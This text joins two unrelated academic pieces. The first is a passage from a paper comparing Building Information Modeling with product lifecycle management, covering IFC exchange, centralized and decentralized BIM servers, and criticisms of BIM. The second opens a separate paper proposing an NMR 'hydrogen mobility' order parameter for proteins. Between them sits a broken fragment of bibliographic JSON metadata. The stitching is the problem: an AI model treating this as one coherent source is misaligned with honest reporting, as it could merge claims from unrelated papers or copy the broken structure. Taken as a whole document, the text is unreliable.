The systems and practices that underlie lifecycle management continue to undergo significant changes. New and emerging IT, the rapid globalization of businesses, and evolving core functions such as collaborative design and outsourced manufacturing force companies to continually re-examine their product development practices, which can be costly and time-consuming [6,10].
Building Information Modeling
BIM is an object-oriented approach to creating, managing and using various geometric and non-geometric data in a construction project. While conceptually BIM can be used across all phases of a project lifecycle, from design to the demolition of the built environment, in practice the level of integration and maturity of BIM usage across different phases is contingent on multiple factors defined relative to products (both the design artefact and the tools), processes (e.g., operational, methodological, business, legal) and people (e.g., organizations, stakeholders, culture).
Concept and Methods
The evolution of BIM can be traced to simultaneous developments across CAD and information systems, both facilitated by progress in computing power and the emergence of personal computers and the internet. The development of the BIM concept and methodology can be explained on the basis of four attributes: 1) representation, 2) information management, 3) inbuilt intelligence, analysis and simulation, and 4) workflow management. Representation is integral to design, and it has driven the development of BIM in at least two ways. First, in terms of design cognition: as processing capabilities improved, computational tools moved from 2D drafting to 3D models, making visualization and working with complex geometries possible. This move from symbolism to virtualization initially led to photo-realistic renderings (based on solid geometry) and later to intelligent object-oriented models (replacing solid geometry). Second, at the level of communication and collaboration: representations used across multidisciplinary design teams demand greater specification of easily comprehended and disambiguated information. This requires higher levels of detail and accuracy in the geometric and non-geometric information contained in object-based models.
While representation and visualization are part of documenting project-related information, it is equally important to be able to record, manage and use all other forms of building-related data, information and knowledge generated across the project lifecycle. Accordingly, document and information management capabilities that were developed in pre-BIM tools (as independent sets of specifications, documents and spreadsheets) have merged and evolved with BIM applications as information that is typically embedded, appended or linked to object-based models. Linking between all forms of geometric and non-geometric data is a critical aspect of BIM. Consequently, traditional users of electronic document management systems, such as contractors and project managers, expect BIM to provide similar information management capabilities, with the added advantage of visualization. In construction, this typically takes the form of a BIM model server (see [17] for a discussion). Depending on the level of BIM implementation and maturity, these systems may or may not be enabled in the project environment.
The object-oriented premise of BIM enables integration of CAD and information management capabilities. In doing so, it is possible to intelligently link different objects with relationships and constraints, allowing various forms of automated analysis and simulation, ranging from environmental and structural analysis to cost estimating and construction scheduling. Various forms of building compliance 'checks', such as interference and clash detection, are now common. Increasingly, BIM applications are becoming knowledge-based systems with more and more domain knowledge being integrated. Consequently, the number of BIM applications is expanding rapidly, each catering to different discipline-based requirements.
With the complexity, intelligence and number of BIM applications growing, information and workflow management is critical. Given the richness of building-related and project-related information, it is desirable to design and plan project- and discipline-specific workflows. Design process optimization is receiving growing attention in recent efforts to model information flow and develop BIM workflow management frameworks, leading to new cloud-based approaches (see e.g., [19]).
Information Systems and Technologies
BIM shares many characteristics with PLM. The platforms supporting BIM resemble Crnkovic's [13] loose or no integration levels. Technologically, some of the key characteristics of BIM are: 1) open data standards, 2) centralised and decentralised BIM, 3) information exchange standards, and 4) data and information structures. To achieve interoperability between BIM applications, open file formats such as the Industry Foundation Classes (IFC) have been developed. IFC files can be viewed in most applications, but modifications have to be undertaken in the native format and converted back to IFC; this process is error prone. Even if most geometric data can be exchanged completely, the intelligence is often lost in the transformation. Another information exchange method is sharing data through middleware or APIs; however, this requires that separate links be established between each pair of applications.
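To make the file-based exchange concrete, the sketch below reads a shared model through the open IFC schema using ifcopenshell, an open-source IFC toolkit; the paper itself does not prescribe any particular tool, and the file name is a placeholder.

```python
# Hedged sketch of file-based IFC exchange: reading a shared model with
# ifcopenshell, an open-source IFC toolkit (not mandated by the paper).
# "model.ifc" is a placeholder path.
import ifcopenshell

model = ifcopenshell.open("model.ifc")

# Queries work against the open, vendor-neutral IFC schema ...
walls = model.by_type("IfcWall")
print(f"{len(walls)} wall objects in the shared model")
for wall in walls[:3]:
    print(wall.GlobalId, wall.Name)

# ... but, as noted above, modifications must be made in the native
# authoring tool and re-exported: round-tripping through IFC can lose
# parametric "intelligence" even when the geometry survives.
```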
The BIM database can be either centralized or decentralized. In a centralized approach, information from, e.g., a central IFC-based model must be exported, modified within a native format and imported back into the central model using IFC. This 'roundtrip' is often not a viable option due to interoperability issues [20]. Singh et al. [17] highlight the challenges of system and sub-system integration in a centralized BIM-server approach. Due to this complexity, a decentralized, distributed information management approach is increasingly being considered [20]. In a decentralized approach, collaboration can occur at two levels: (1) within a single organisation or discipline using similar tools, and (2) across different discipline-specific models shared and combined using IFC. IFC standardization has adopted a 'use case centred' approach [21]. Different use cases and information exchange requirements are specified in Information Delivery Manuals (IDM). IDMs, together with other model management protocols, have given rise to a variety of policy documents such as BIM Management, Coordination and Execution Plans [22].
Object-based building models include both non-modifiable internal data structures and information structures that enable model management. NBIMS (the National BIM Standard) lists three potential reference standards that can be used to structure model information: IFC, as discussed above; the Construction Specifications Institute (CSI) OmniClass; and the CSI IFDLibrary [23]. OmniClass provides a standardized basis for classifying information created and used by the North American AEC (architectural, engineering and construction) industry. The IFD initiative, based on ISO standards and driven by buildingSMART, aims to create and catalogue a data dictionary of building objects and to bring disparate sets of data into a common view of the construction project or asset. In addition to reference standards, a variety of metadata is also contained in the BIM model, e.g., information related to object creation and history. A recent development in BIM systems is towards distributed transactional models, e.g., the DRUM concept [20], which aims to create a mechanism to manage linked partial models such that building information can remain distributed.
Effects
Effects of BIM are visible both at micro (project and organization) and macro (industry and national) levels. The potential benefits of BIM are best exploited through the collaborative engagement of different stakeholders from the early stages of the project. Accordingly, new forms of project delivery practice are emerging, such as Integrated Project Delivery (IPD), an alliance-based relational contracting approach that aims to align the interests, benefits, roles, risks and responsibilities of all project stakeholders [24]; the Big Room, a multidisciplinary BIM coordination office [25]; and 'knotworking', occasional collocated and intense design sessions in which distributed design teams physically get together to make rapid progress [26]. Furthermore, with increasing BIM maturity, its role and scope are expanding to different aspects and domains across the building lifecycle, with specific topics such as BIM for facilities and operations management, lean construction, prefabrication, and safety. At a macro level, governments in many countries are mandating the use of BIM to facilitate productivity gains in the AEC sector. Among the various challenges in realizing these mandates is training enough BIM-skilled and BIM-literate personnel.
Criticisms
BIM has received criticism on various issues, especially concerning, (1) data transfer and systems integration, (2) ill-defined terminology, scope and purpose, and (3) unstructured implementation processes.
Data Transfer and System Integration:
There are gaps in using BIM smoothly from conceptual design to detailed design, from design model to construction model, from as-designed to as-built data, etc. These interfaces need to be resolved for effective BIM usage. The integration of BIM with advanced structural analysis techniques such as the Finite Element Method also remains a challenge. While open standards have progressed significantly over the last two decades, the commercial interests of software vendors have also stunted the pace of development around interoperability.
Terminology, Scope and Purpose: The term and concept of BIM is unclear to many, with the M in BIM being used interchangeably for models (product), modelling (process), and management (process). This needs to be resolved for stakeholders to reach a shared understanding of what they are committing to. Furthermore, the scope and purpose of BIM in a project are rarely defined clearly, leaving uncertainties about aspects such as the level of detail, information flow and modes of information exchange across stakeholders, data transfer, model ownership and handover.
Unstructured Implementation Processes:
One of the primary challenges in addressing macro-level issues is to understand and plan around the key factors that drive and determine how and where BIM efforts are concentrated. For example, in Finland the earliest BIM developments, piloted in 1994, focused on later lifecycle management [27]. However, as the pilot project generated greater interest in BIM, direct and immediate benefits were seen by design consultants and contractors. The resulting market forces concentrated BIM development on the design and construction phases, while work in facilities and later lifecycle management came to a standstill. In recent years this development has seen a revival; e.g., efforts have sought to establish definitions of as-built datasets for FM [28], and the COBie initiative (Construction Operations Building information exchange) has been introduced for the exchange of IFC-based FM data [29].
Discussion
PLM and BIM share some similarities in their lifecycle management objectives and in the nature of their practice-based criticisms; however, they differ in critical areas concerning their underlying methods, scope of business, technological and enterprise integration, and intended effects. This section attempts to elucidate these similarities and distinctions so that valuable learning opportunities may be identified. Similarities exist in the key objectives of PLM and BIM, which include functionalities that support and manage the creation, release, change and verification of product-related information. PLM and BIM platforms typically provide the same core functions: management of design and process documents and models, development and control of BOM records, provision of electronic file repositories, inclusion of document and model metadata, identification of model content for compliance and verification, provision of workflow and process management for change approvals, control of multi-user secured access, and data export controls. It should also be noted, however, that whilst BIM platforms have been designed to cover these areas, their level of IT maturity and process sophistication appears to lag behind that of most PLM system architectures.
Like PLM, BIM aims to integrate people and data processes throughout the design, construction and operation of a product (or built asset). However, it has only been in the last five to seven years that an increasing focus on the application of BIM throughout the whole building lifecycle has emerged and the significance of business systems and business process integration has been acknowledged. The literature surveyed reveals a growing number of studies considering a range of building lifecycle management issues, much of this research seeking to bridge the interface between AEC processes and the activities of facility operations and management. BIM servers are now being developed to provide a large integrated data- and knowledge-base that can be leveraged not only in design and engineering but also in the planning and management of component fabrication, construction operations, and facilities maintenance [30]. Thus, research efforts to 'close the loop' and develop the BIM concept for business process integration across the whole building lifecycle are increasing. This increasing scope, functionality and value of BIM is a consequence of platform expansion targeting collaborative processes, shared resources and decision-making to support the whole lifecycle [4].
The adoption of a lifecycle perspective in any sector depends on multiple factors. Depending on the size, cost and complexity of an engineered product or built asset, its design and production will normally adhere to discrete stages that form a system lifecycle. In construction, IT implementations that span project or lifecycle stages are less established than in manufacturing sectors such as aerospace. The speed and breadth of IT adoption across the extended enterprise is also greater in these sectors. PLM in manufacturing is therefore a more proven lifecycle integration solution. In construction, even despite BIM-enabled IPD approaches, the flow and management of information is still not fully integrated among all stakeholders. In developing and advancing the BIM concept, it is therefore imperative to adopt an ecosystem approach to mapping the network of interacting AEC actors, corporate business processes, project processes, activities, methods and technologies.
"year": 2014,
"sha1": "460244a96e40568e19100131c61d89bac2b4dfb0",
"oa_license": "CCBY",
"oa_url": "https://hal.inria.fr/hal-01386473/file/978-3-662-45937-9_4_Chapter.pdf",
"oa_status": "GREEN",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "3eb22248fc3bc7bcaac7812af65e934b04d80b23",
"s2fieldsofstudy": [
"Computer Science"
],
"extfieldsofstudy": [
"Engineering",
"Computer Science"
]
} |
Hydrogen skeleton, mobility and protein architecture
The mobility of the proton-proton radial vectors is introduced as a quantitative measure of the structural dynamics of organic materials, especially protein molecules. As defined for the entire molecule, the hydrogen mobility (HM) is proposed as an "order parameter," which describes the effect of motional narrowing on inter-proton dipole-dipole interactions. HM satisfies all requirements of an order parameter in the Landau molecular field theory of phase transitions. The wide-line NMR second moments needed to obtain HM are exactly defined and measurable physical quantities, which are not produced by mathematical fitting and do not carry the limitations and restrictions of any model (theoretical formalism). We first demonstrate the usefulness of HM on small organic molecules, with data taken from the literature. We then outline its link with structural and functional characteristics for a range of proteins: HM provides a model-free parameter based on first principles that can clearly distinguish between globular and intrinsically disordered proteins, and can also provide insight into the behavior of disease-related mutants.
Introduction
The importance of the dynamic nature of protein molecules cannot be overestimated: understanding their function in its entirety cannot be achieved by considering them as rigid molecules. Their dynamic state is affected by their thermal and chemical surroundings, and the limitations of the information inherent in the applied experimental method(s) also cannot be neglected. Beyond the general and conceptual question of motion (as detailed in Appendix A), the identification and proportion of mobile parts (residues), the physical characteristics of their motion, and the effect of mobility on their reactivity/function all require special attention.
Addressing mobility is motivated by works approaching this subject from different angles. Halle criticized experimental approaches and results on aqueous protein solutions, stating that "the progress is less and erratic and the results given by different experimental methods are contradictory and more or less model dependent in the interpretation" 1 . Saito and Kobayashi carefully examined the physical basis of protein architecture. 2 Wlodawer and colleagues discussed the limitations of structural information obtained by X-ray crystallography. 3 They emphasized the lack of direct determination of hydrogen positions, which suggests that proton magnetic resonance experiments can complement such measurements very effectively. The regularly and generally used NMR procedures were summarized, e.g., by Dyson and Wright with particular focus on intrinsically disordered proteins, 4 by Duer for studying molecular motions in solids, 5 by Antzutkin for molecular structure determination in biology, 6 and by Smith for studying protein structures. 7 The change in the protein structural paradigm from order to disorder (from globular to intrinsically disordered (ID) proteins) was discussed in reference 8. Realizing the limitations of all approaches applied to date, we would like to add a novel wide-line NMR approach to complement the usual set of methods; the experimental analyses (including wide-line NMR) of IDPs were introduced earlier in references 9 and 10.
Our experimental approach relies on wide-line NMR spectrometry, as we seek global, non-selective information. The elementary probe we use is the atomic nucleus of hydrogen (the proton magnetic dipole moment) residing in the protein molecules. The relevant variants of wide-line NMR spectrometry are detailed in the book chapters 12 in reference 9 and 13 in reference 10. The wide-line spectrum and its even moments, especially the second moment (a main indicator of internal motion in solids; see Appendix B), are used here as a first step. In prior works, we outlined the physical basis of the applied method and detailed the evaluation and interpretation protocols. The key factor in our approach is the hydrogen mobility (i.e., the time dependence of proton-proton radial vectors), which is indicative of NMR-visible motions and not of the high-frequency lattice vibrations. This hydrogen mobility depends on the molecular structure and temperature, and also on the chemical environment in the case of solutions.
In this paper, we describe in detail the theoretical basis of the second moment of the NMR spectrum. We first consider the case of a rigid lattice; motional narrowing is treated subsequently. We give the definition of the novel order parameter we term hydrogen mobility and put it into the context of order parameters in general. We then review the experimental second moment data found in the literature for several organic compounds and calculate the corresponding hydrogen mobility values. We test and give reasons for the application of the hydrogen mobility. Based on experimental data, we calculate the hydrogen mobility factors for some selected proteins and discuss the importance of hydrogen mobility as a global, model-free order parameter in describing function-related features of protein flexibility.
Rigid lattice
This section is prefaced with the remark that there is no analytical description of the spectra of multi-spin systems (e.g., molecules made of numerous atomic nuclei of various types). The series expansion technique can be used 11,12 to obtain a moments expansion of the time-domain NMR-signal (FID or solid echo).
The magnetic dipolar interaction plays a key role in the wide-line spectroscopy of solids. The magnitudes (or lengths) of the vectors connecting the interacting nuclei and their directions with respect to the external magnetic field directly determine the architecture (geometrical arrangement, structure or topology) of the nuclear spin system. This is the reason why the direct measurement of dipolar interactions is essential for describing the structure of proteins. The basic quantum theory of the dipolar interaction and properties of the NMR spectrum was given by Van Vleck in his Nobel laureate work. 13 Determining the second moments is viewed as a first step, used subsequently to characterize the rigid lattice and the internal motions of molecules.
To understand the NMR characteristics, the wide-line NMR spectrum and the even moments, and to lay the groundwork for planning and interpreting the experiments, we invoke short passages from Abragam's (chapters IV and X, ref. 14) and Slichter's (ref. 15) treatments. For $N$ identical spins $I$, the Van Vleck rigid-lattice second moment reads

$$M_2 = \frac{3}{4}\left(\frac{\mu_0}{4\pi}\right)^2 \gamma^4 \hbar^2 I(I+1)\,\frac{1}{N}\sum_{j}\sum_{k\neq j}\frac{\left(1-3\cos^2\theta_{jk}\right)^2}{r_{jk}^6}, \qquad (1)$$

where $\gamma$ is the gyromagnetic ratio, $\mu_0$ is the magnetic constant, $N$ is the number of nuclei, $r_{jk}$ is the magnitude of the vector connecting the $j$th and $k$th nuclei, $\theta_{jk}$ is the angle between the internuclear vector $\mathbf{r}_{jk}$ and the time-independent magnetic induction vector $\mathbf{B}_0$, and the double summation means averaging over all the spins and all the neighbors. If all the resonant spins are located in equivalent positions, the double summation reduces to a single one, being independent of one of the indices; there are then $N$ equivalent sums, one for each value of $j$. In that case the second moment is

$$M_2 = \frac{3}{4}\left(\frac{\mu_0}{4\pi}\right)^2 \gamma^4 \hbar^2 I(I+1)\sum_{k\neq j}\frac{\left(1-3\cos^2\theta_{jk}\right)^2}{r_{jk}^6}. \qquad (2)$$

(We have to emphasize that this is not the case for protons in proteins, in spite of the general claim in some papers.) Each term in Eqs. 1 and 2 is clearly of the order of $(\gamma B^{k}_{\mathrm{loc}})^2$, where $B^{k}_{\mathrm{loc}}\sim(\mu_0/4\pi)\,\gamma\hbar/r_{jk}^3$ is the contribution of the $k$th spin to the local field at spin $j$. Equations 1 and 2 precisely define the local field, which enables one to compare an exactly defined theoretical quantity with the measured (experimental) value. The summation has a short-range character because of the strong distance dependence of the $r_{jk}^{-6}$ term. It is also necessary to address what "equivalent positions" means in general, and especially in a protein molecule: "the equivalent arrangements of the non-zero nuclear magnets around the resonant nuclei" gives the answer. In our case, not all the protons are equivalent and, consequently, only a few terms from one part of the double summation are to be used in the second moment calculation. How many? Decomposition of the components in the wide-line spectrum helps to estimate the number.
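The double sum in Eq. 1 is straightforward to evaluate numerically once proton coordinates are known. The sketch below implements Eq. 1 directly for a toy two-proton geometry (not protein data; constants rounded), with B0 taken along the z axis:

```python
# Direct numerical evaluation of the Van Vleck second moment, Eq. 1, for
# protons (I = 1/2) at known positions. Toy geometry only, not protein
# data; B0 is taken along the z axis. Result is in rad^2 s^-2.
import numpy as np

MU0_4PI = 1.0e-7       # mu0 / 4pi  [T m A^-1]
GAMMA_H = 2.675e8      # proton gyromagnetic ratio [rad s^-1 T^-1]
HBAR = 1.055e-34       # reduced Planck constant [J s]
I = 0.5                # proton spin

def second_moment(positions):
    """Rigid-lattice M2 from Eq. 1 for N like spins (double sum / N)."""
    pos = np.asarray(positions, dtype=float)
    n = len(pos)
    pref = 0.75 * MU0_4PI**2 * GAMMA_H**4 * HBAR**2 * I * (I + 1)
    total = 0.0
    for j in range(n):
        for k in range(n):
            if k != j:
                r = pos[k] - pos[j]
                d = np.linalg.norm(r)
                cos_t = r[2] / d              # theta_jk from B0 (z axis)
                total += (1.0 - 3.0 * cos_t**2) ** 2 / d**6
    return pref * total / n

# Two protons 1.78 Angstrom apart, with r_jk perpendicular to B0:
pair = [(0.0, 0.0, 0.0), (1.78e-10, 0.0, 0.0)]
m2 = second_moment(pair)
# Divide by gamma^2 for field units (T^2); multiply by 1e8 for gauss^2.
print(f"M2 = {m2:.3e} rad^2 s^-2 (= {m2 / GAMMA_H**2 * 1e8:.1f} G^2)")
```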
If, besides protons, there are also other nuclear species, they also contribute to the local fields and to the total second moment (the form of this contribution is given in ref. 15 and is not needed here). In the case of proton resonance, the dipolar contributions of other nuclei (e.g., 13C, 15N, 17O) are zero or negligible; this is not true for other species (e.g., 23Na or 35Cl).
As a consequence, the hydrogen nuclei (the protons) give the topological map of the immobile protein molecule and of the rigid protein-water system (which we may term the hydrogen skeleton). The use of Eq. 1 or Eq. 2 gives the theoretical basis for controlling the topological construction of the hydrogen skeleton of our molecules. It is to be mentioned, again, that the arrangement of the hydrogen atoms is missing from the X-ray maps. 3 Both the length and the direction of the r_jk proton-proton vectors are given as structural elements in single crystals. Only the length of the proton-proton vector exists in a powder (polycrystalline or lyophilized) sample because of "space-averaging"; the second moment then simply depends on the length (magnitude) of r_jk. For interacting spin pairs, the powder-averaged contribution to the second moment of the rigid lattice is

$$M_2^{\mathrm{pair}} = \frac{3}{5}\, I(I+1)\left(\frac{\mu_0}{4\pi}\right)^2 \gamma^2\hbar^2\, r_{jk}^{-6}.\qquad(3)$$

The fourth moment is only used here as a control for the analytical form of the line shape in Chapter 4 (wide-line NMR spectra and second moments of proteins); i.e., the details are not cited, and only references 10, 12, and 13 are mentioned again. The important point for our treatment is that the ratio of the fourth moment to the square of the second moment is 3 for a Gaussian line.
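The Gaussian control just mentioned is easy to verify numerically: for any Gaussian line shape, the ratio of the fourth moment to the square of the second moment is exactly 3, independent of the width. A short sketch (the width is arbitrary and chosen only for illustration):

```python
import numpy as np

def even_moments(freq, intensity):
    """Second and fourth moments of a line shape about its centre of mass,
    assuming a uniformly spaced frequency grid."""
    w = intensity / intensity.sum()
    center = np.sum(freq * w)
    x = freq - center
    m2 = np.sum(x**2 * w)
    m4 = np.sum(x**4 * w)
    return m2, m4

# Gaussian line with an arbitrary width (the ratio is width-independent)
f = np.linspace(-50.0, 50.0, 20001)
g = np.exp(-f**2 / (2.0 * 4.0**2))   # sigma = 4
m2, m4 = even_moments(f, g)
print(m2, m4 / m2**2)   # m2 -> sigma^2 = 16, ratio -> 3.0
```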
Motional narrowing
As the temperature of the systems studied is varied, the positions of the protons, and hence the dipole-dipole interactions between neighboring pairs, become time dependent. The second moments (Eqs. 1 and 2) become time dependent through the r_jk and θ_jk quantities as a consequence of atomic motions. The phenomenon is known as motional narrowing, 11,12 and its results are the narrowing of the NMR spectrum and reduced moments as a consequence of time averaging. For a spin pair, Abragam 14 and Slichter, 15 following Andrew and Eades, 16 described the time averaging under rotation around a given axis by

$$M_2^{\mathrm{rot}} = \left(\frac{3\cos^2\gamma_{jk}-1}{2}\right)^2 M_2^{\mathrm{rigid}},\qquad(4)$$

where γ_jk is the angle between the radius vector r_jk and the rotation axis. (If γ_jk = 90°, the time-averaged reduced moment is the rigid-lattice value reduced by a factor of 4.) Equation 4 forms the basis of the magic-angle spinning (MAS) method, 17 in which the sample is spun physically at the angle γ_jk = 54°44′ (cos²γ_jk = 1/3) with respect to the direction of the magnetic field. In this way, the reduced second moment takes the value zero for each spin pair. When there are internal molecular motions, the averaging is done also over the possible γ_jk angles, which does not result in a zero value. The very simple reduction factor in Equation 4 is only valid for the intramolecular contribution to the second moment. The intermolecular contribution, which results from interactions between spins belonging to different molecules, is affected by the rotation in a more complicated way, since both the distances between spins and the orientations of the spin-spin vectors change.
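The reduction factor in Eq. 4 can be tabulated directly; the short sketch below reproduces the two limiting cases quoted above, the factor 1/4 at γ_jk = 90° and the vanishing reduced moment at the magic angle.

```python
import numpy as np

def rotation_reduction(gamma_deg):
    """Intramolecular second-moment reduction factor of Eq. 4 for fast
    rotation about an axis at angle gamma to the internuclear vector."""
    c2 = np.cos(np.radians(gamma_deg))**2
    return ((3.0 * c2 - 1.0) / 2.0)**2

print(rotation_reduction(90.0))       # 0.25 -> rigid value reduced 4x
print(rotation_reduction(54.7356))    # ~0   -> magic-angle condition
print(rotation_reduction(0.0))        # 1.0  -> axis along r_jk, no averaging
```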
The two types of averaging, the space average and the time average, can be done for every topological and motional model. The summations (Eqs. 1-2) and several possible motions should be considered, not forgetting that the summation means that the individual contributions are added up. This procedure involves numerous assumptions about the topology and the motional states and, consequently, the results are model dependent. Instead, we chose to determine the second moments experimentally: both the reduced second moment and the rigid-lattice value can be measured. In the typical temperature dependence of the NMR second moment, which reflects the frequency of the internal motion, the decrease of the second moment occurs over a temperature range whose position and width depend on the material studied. 18

Order parameter

An order parameter characteristic of the motional state of the proton-proton pairs can be theoretically defined on the basis of Equations 1-4. This hydrogen-mobility order parameter, which we introduce here, is defined as

$$HM(T) = 1 - \frac{M_2(T)}{M_2(\mathrm{RL})},\qquad(5)$$

where M_2(T) is the second moment measured at an arbitrary temperature T, M_2(RL) is the second moment measured in the rigid-lattice state at a sufficiently low temperature, and HM refers to the average mobility of the proton-proton vectors according to Equations 1-4. If the spectrum can be decomposed into, e.g., two components, as found in several cases, then two order parameters, i.e., two mobility values, can be measured. Equation 5 then takes the form

$$HM_x(T) = 1 - \frac{M_2^x(T)}{M_2^x(\mathrm{RL})},\qquad(6)$$

where x = t, b, n refers to the "total," "broad," and "narrow" spectral components, respectively. HM_x is zero for an immobile (rigid/ordered) system and one for highly mobile (fluid-like) systems. The former state is probably realized at the temperature of liquid helium, whereas the latter is only achieved above the melting point. There are two important points to be addressed: (1) What is the quantity to normalize with, i.e., what is the second moment of the rigid lattice? (2) Which spectral component can be assigned to which part of the molecule? "Order" is connected with the time dependence or mobility of the proton spins (nuclear magnetic moments): HM = 0 for a rigid system and HM = 1 for the liquid state; both these states and the intermediate states can be measured. In Appendix C, some considerations are given for the "order parameters" as defined through the Lipari-Szabo formalism of protein-solvent systems.
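Because HM is built from only two measured numbers, its evaluation is trivial to automate. A minimal sketch of Eqs. 5 and 6 follows; all second-moment values in it are hypothetical placeholders, not measured data.

```python
def hydrogen_mobility(m2_T, m2_RL):
    """Hydrogen-mobility order parameter HM(T) = 1 - M2(T)/M2(RL) (Eq. 5).
    Returns 0 for a rigid lattice and 1 for a fully mobile (liquid) state."""
    hm = 1.0 - m2_T / m2_RL
    if not 0.0 <= hm <= 1.0:
        raise ValueError("M2(T) must lie between 0 and M2(RL)")
    return hm

# Hypothetical two-component resolution (Eq. 6); values in 1e-8 T^2 units
m2_rl = {"t": 22.0, "b": 24.0, "n": 8.0}    # rigid-lattice references
m2_rt = {"t": 6.0,  "b": 9.0,  "n": 0.5}    # room-temperature values
for x in ("t", "b", "n"):
    print(f"HM_{x} = {hydrogen_mobility(m2_rt[x], m2_rl[x]):.2f}")
```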
About order parameters in general
We have learned from the thermal properties of solids, e.g., in reference 19 and especially in the Landau mean-field theory of phase transitions, 20 that a large variety of systems can be described by a single, temperature-dependent order parameter. The order parameter might be the magnetization in a ferromagnet, the dielectric polarization in a ferroelectric system, the fraction of superconducting electron pairs in a superconductor, the director distribution in nematic liquid crystals, 21 or the fraction of neighboring A-B bonds out of the total number of bonds in an AB or A3B alloy. The physical quantity to which the order parameter refers is clearly given, and its value must lie between 0 and 1. The proposed HM(T) satisfies these criteria.
Experimental Second Moment Data in the Literature and Estimated Hydrogen Mobility
To appreciate the insight offered by HM and its relevance as an order parameter in describing proteins, we first look into relevant literature data on small organic compounds. These results are related to motions of small molecules and parts of molecules, which helps us familiarize ourselves with the relevant orders of magnitude. The HM(T) values were calculated for cases where the second-moment values were given at at least two temperatures.
The second moment measured for samples containing water of crystallization is M2 ~28·10−8 T2. 22 The expected second moment for groups is only M2 ~3·10−8 T2. 23,24 Works on the molecular motions detected in solid hydrocarbons 25-27 indicate the possible forms of molecular motion, which range from torsional and rotational motions to translational diffusion. The second-moment values measured for long-chain paraffins (n-CnH2n+2) at T = 82-99 K can be considered rigid-lattice values, with the M2 values given in Table 1; 25 the relevant spectra showed no fine structure. If the structure of a crystal is known and the lattice can be assumed rigid, the second moment of the proton resonance line can be calculated by applying the Van Vleck formula (Eq. 1). The crystal structure of n-C29H60 was given among the results of X-ray investigations of a series of normal paraffins (n-CiH2i+2; i = 6-44). 28-30 Although X-ray diffraction cannot give the locations of the hydrogen atoms, it accurately measures the C-C bond lengths. The geometric positions of the hydrogen atoms (protons) were then determined by assuming tetrahedral symmetry for the C-H bonds and by using the spectroscopic C-H bond lengths. The long-chain paraffins n-octadecane (n-C18H38), n-octacosane (n-C28H58), and dicetyl (n-C32H66) were investigated by continuous-wave NMR spectroscopy. 25 The good agreement between the measured values and those calculated for n-octacosane and dicetyl proves the rigidity of the H skeleton, whereas the difference in the case of n-octadecane points to a small hydrogen mobility. The deviation from the two other paraffins is not surprising, because the lower melting point of n-octadecane also indicates a looser crystal structure. The value of the HM mobility order parameter introduced here is 0.12 in this case.
Systematic investigations were done on benzene by partly replacing the H atoms with D (deuterons). The H-D exchange dilutes the magnetization of the H lattice because of the much smaller nuclear moment of D, whose contribution to the second moment is approximately 2% of that of the protons. The large HM value (Table 1) can be explained by the rotation of the full proton system (H-skeleton) around the hexad axis, that is, by the rotation of the benzene molecule. HM is practically independent of the H/D ratio.
In the case of N,N-dimethylaniline, 31 the connection of the -N(CH3)2 group to the benzene ring gives an estimated rigid-lattice value of M2 = 18.4·10−8 T2. The measured second moment is M2 = 9.4…8.5·10−8 T2 in the temperature range of −190°C to 0°C, and it slowly decreases with increasing temperature because of the lattice dilatation. The value HM = 0.51 is a consequence of the reduced symmetry compared with that of benzene. The actual value can be interpreted by the rotation of the -CH3 groups and the immobility of the benzene ring.
For urea, 32 the measured second moment is M2 = 20.8·10−8 T2 at ~195 K and M2 = 6.9·10−8 T2 at room temperature, and the hydrogen mobility estimated by us is HM = 0.87. The high value indicates a molecular motion of a high degree of symmetry, higher than that of the -NH2 groups. Xylenes and mesitylene 33 give measured second moments of 9.8·10−8 T2 to 9.9·10−8 T2 at 95 K, which decrease upon heating to 205 K due to the lattice dilatation. The interpretation of the results is similar to that for N,N-dimethylaniline, that is, rotation of the methyl groups and an immobile benzene ring. The experimental work on hexamethylbenzene 34 is outstanding in that several NMR characteristics were measured between 2 K and 450 K. The solid-echo radiofrequency pulse combination was used for the second-moment measurements. The X-ray structure is known, and the calculated rigid-lattice second moment is M2 = 32.7·10−8 T2. The measured second moments are 20·10−8 T2 to 14.5·10−8 T2 in the 2 K to 50 K range, M2 = 13.0·10−8 T2 at 90 K, and M2 = 2.5·10−8 T2 above 210 K. The corresponding HM values are 0.60 and 0.98, respectively. The whole molecule rotates above 210 K. One of the surprising conclusions is that the methyl groups are already in a motional state at 2 K.
For the compounds 1,4-dicyclohexylcyclohexane, 25 cyclohexane 26 and adamantane (Bokor, M. et al., to be published), the results are summarized in Table 2. Isotropic (not uniaxial) rotation exists in the high symmetry cyclohexane and adamantane molecules in the solid phase.
The results for a few amino acids are also shown in Table 3. Amino acids are in zwitterionic form in the crystalline state. Rapid random reorientation of the -NH3 and -CH3 groups in the solid amino acids was found above 150 K. 35,36 There are two motional processes manifesting themselves in the narrowing of the NMR spectra with increasing temperature. The second moments fall in two successive steps with temperature as the frequency of motion of each process becomes comparable with the spectral width.
A few generalizations are already apparent upon analyzing and comparing the data on these organic compounds. Each molecule shows extensive internal mobility in the solid phase at room temperature. In many instances, the mobility of the H-H vectors can be so high as to result in HM = 0.95. The mobile state also exists at lower temperatures, even at T = 4 K in some cases. The HM order parameter for the hydrogen mobility is a quantitative measure of the dynamic state, and it requires no model to be applied, in contrast with the second moment measured at a given temperature.
Wide-Line NMR Spectra and Second Moments of Proteins
Studies on small organic molecules and amino acids suggest that the order parameter introduced here adequately captures the extent of hydrogen mobility without invoking a model for interpreting the experimental observations. Diakova et al. 37 studied the wide-line 1H-NMR FID signals of dry and hydrated lysozyme powders. The FID of the hydrated protein powder was fitted to a sum of Gaussian functions (plus a constant at the highest water contents). It was found that the residual water at levels below 5 wt% is not rotationally mobile, and the water-proton NMR signal is indistinguishable from the FID of the solid protein protons. The fast component of the FID, which corresponds to the majority of the protein protons that do not experience significant dynamical averaging, was isolated and analyzed. These experiments suggest that our approach might also be used for characterizing the general structural behavior of proteins.
